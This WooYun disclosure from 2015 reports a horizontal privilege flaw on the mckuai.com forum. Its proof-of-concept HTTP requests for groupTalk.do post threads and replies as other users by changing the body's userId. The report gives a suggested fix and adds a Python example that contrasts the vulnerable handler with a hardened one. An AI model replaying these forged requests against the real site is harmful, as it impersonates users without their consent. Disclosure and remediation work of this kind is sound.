
Vulnerability Summary

Defect ID: wooyun-2015-0105004

Title: 麦块 (mckuai.com): post and reply as arbitrary users

Vendor: 麦块

Author: 干脆面

Submitted: 2015-04-01 18:39

Fix deadline: 2015-05-16 18:40

Disclosed: 2015-05-16 18:40

Type: Unauthorized access / privilege bypass

Severity: Low

Self-rated Rank: 3

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-04-01: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-05-16: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Horizontal privilege problem in posting and replying.

Detailed description:

The post and reply handlers do not verify who is performing the action: the acting user is taken from the userId parameter in the request body rather than from the server-side session, so any logged-in user can forge another user's identity when creating a thread or a reply.

Proof of Concept:

1. Construct the thread reply request:
POST http://www.mckuai.com/groupTalk.do HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.mckuai.com/thread-177809.html
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.mckuai.com
Content-Length: 763
Connection: Keep-Alive
Pragma: no-cache
Cookie: mcUserKeyCookieSave=xxx; JSESSIONID=xxx
act=addFollow&userId=106801&operUserId=5140&isNew=1&editTalkId=&forumId=1&forumName=矿工茶馆&talkId=177809&content=%253Cp%253E%25E5%259C%25B0%25E5%259D%2580%25E5%2590%258E%2520%25E8%25B7%259F%25E4%25B8%25AA%25E7%25A9%25BA%25E6%25A0%25BC%2520%25E5%25B0%25B1%25E6%2598%25AF%25E8%25BF%259E%25E6%258E%25A5%253C%252Fp%253E%253Cp%253E%253C%252Fp%253E&talkTitle=%25E5%2588%25B0%25E7%258E%25B0%25E5%259C%25A8%25E6%2588%2591%25E9%2583%25BD%25E4%25B8%258D%25E7%259F%25A5%25E9%2581%2593%25E6%2580%258E%25E4%25B9%2588%25E5%258F%2591%25E9%2593%25BE%25E6%258E%25A5%25E5%2592%258C%25E8%25A7%2586%25E9%25A2%2591%25EF%25BC%258C%25E6%25B1%2582%25E5%25A4%25A7%25E5%25A4%25A7%25E4%25BB%25AC%25E7%259B%25B8%25E5%258A%25A9%25E5%2595%258A%25EF%25BC%2581%25EF%25BC%2581&authCode=ZZS0
2. Manually change userId and authCode and resend the request; the reply is then posted under whichever identity the userId names. Values tried:
(1) userId=106801
(2) userId=106802
(3) userId=106803
3. Response (the body reads 跟帖成功, "reply posted successfully"):
HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Tue, 31 Mar 2015 06:54:48 GMT
Content-Type: text/html;charset=GBK
Connection: keep-alive
X-Hop-By: uni-ly-dl-se1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Vary: Accept-Encoding
X-Powered-By-Anquanbao: MISS from uni-zz-dl-sg2
Content-Length: 8
跟帖成功

[Screenshot: 无标题4.png]


4. Construct the new-thread request:
POST http://www.mckuai.com/groupTalk.do HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://www.mckuai.com/forum-1.html
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: www.mckuai.com
Content-Length: 160
Connection: Keep-Alive
Pragma: no-cache
Cookie: mcUserKeyCookieSave=xxx; JSESSIONID=xxxx
act=addTalk&userId=106803&forumId=1&talkType=%25E9%2597%25B2%25E8%2581%258A&talkTitle=freshman&content=%253Cp%253Ehi%252C%2520helloword%253C%252Fp%253E&endTime=
5. Response (the body reads 发帖成功, "thread posted successfully"):
HTTP/1.1 200 OK
Server: ASERVER/1.2.9-3
Date: Tue, 31 Mar 2015 07:00:47 GMT
Content-Type: text/html;charset=GBK
Connection: keep-alive
X-Hop-By: uni-ly-dl-se1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Vary: Accept-Encoding
X-Powered-By-Anquanbao: MISS from uni-zz-dl-sg2
Content-Length: 8
发帖成功

[Screenshot: 无标题5.png]


Suggested Fix:

Keep the userId on the server side (in the session) and, when creating a post or reply, take the poster's identity from that server-side data rather than from the request body; a userId supplied by the client should be ignored.
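The following is an added example, not code from mckuai.com or from the report author, that models the behaviour described in the detailed description and proof of concept beside the fix suggested above. It parses the addTalk body captured in step 4 (the text fields arrive double URL-encoded), then runs it through two hypothetical handlers: one that trusts the body's userId, as the site did, and one that takes the identity from the server-side session. The handler names, the Post record, the session dictionary and the choice of user 5140 (the operUserId seen in the step 1 request) as the logged-in user are assumptions for illustration.

```python
"""Model of the mckuai.com groupTalk.do post/reply flow: client-trusted userId vs session identity.

Added example, not the site's code: the handler names, the Post record and the session
store are assumptions; the request body is the addTalk body captured in the report.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote

# addTalk body captured in the report; content/talkTitle/talkType arrive double URL-encoded.
CAPTURED_ADD_TALK_BODY = (
    "act=addTalk&userId=106803&forumId=1&talkType=%25E9%2597%25B2%25E8%2581%258A"
    "&talkTitle=freshman&content=%253Cp%253Ehi%252C%2520helloword%253C%252Fp%253E&endTime="
)

# Assumed server-side session behind mcUserKeyCookieSave/JSESSIONID. User 5140 is the
# operUserId seen in the report's reply request, taken here as the logged-in user.
SESSION_USER_5140 = {"user_id": 5140}

# Text fields that the site's client double-encodes before submitting (observed in the capture).
DOUBLE_ENCODED_FIELDS = ("content", "talkTitle", "talkType", "forumName")


@dataclass
class Post:
    kind: str        # "addTalk" (new thread) or "addFollow" (reply)
    author_id: int   # identity the post is attributed to
    forum_id: int
    title: str
    content: str


def parse_form(body: str) -> dict:
    """Decode the x-www-form-urlencoded body; parse_qs removes one layer, unquote the second."""
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    for field in DOUBLE_ENCODED_FIELDS:
        if field in form:
            form[field] = unquote(form[field])
    return form


def vulnerable_handler(session: Optional[dict], form: dict) -> Post:
    """Behaviour the report demonstrates: the author is whatever userId the body says."""
    if session is None:
        raise PermissionError("login required")
    if form.get("act") not in ("addTalk", "addFollow"):
        raise ValueError("unknown act")
    return Post(form["act"], int(form["userId"]), int(form["forumId"]),
                form.get("talkTitle", ""), form.get("content", ""))


def hardened_handler(session: Optional[dict], form: dict, audit_log: List[str]) -> Post:
    """Fix from the report: the author comes from the server-side session only.

    The body's userId is ignored, and a mismatch is logged: once the fix is deployed,
    a client sending someone else's id is a useful tampering signal for detection.
    """
    if session is None:
        raise PermissionError("login required")
    if form.get("act") not in ("addTalk", "addFollow"):
        raise ValueError("unknown act")
    claimed = form.get("userId")
    if claimed is not None and claimed != str(session["user_id"]):
        audit_log.append(f"userId mismatch: session={session['user_id']} body={claimed}")
    return Post(form["act"], session["user_id"], int(form["forumId"]),
                form.get("talkTitle", ""), form.get("content", ""))


def demo() -> Tuple[Post, Post, List[str]]:
    """Run the captured body through both handlers as user 5140."""
    form = parse_form(CAPTURED_ADD_TALK_BODY)
    audit: List[str] = []
    return (vulnerable_handler(SESSION_USER_5140, form),
            hardened_handler(SESSION_USER_5140, form, audit),
            audit)


if __name__ == "__main__":
    vuln, fixed, audit = demo()
    print("vulnerable attributes post to:", vuln.author_id)   # 106803, chosen by the client
    print("hardened attributes post to: ", fixed.author_id)   # 5140, the session user
    print("audit:", audit)
```

The same change applies to the addFollow (reply) action, since both share the handler: the session decides who is posting, and the request body only supplies the forum, thread and content.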

Copyright: please credit the source when reposting: 干脆面@乌云


Vulnerability Response

Vendor response:

Vendor could not be contacted, or vendor actively declined.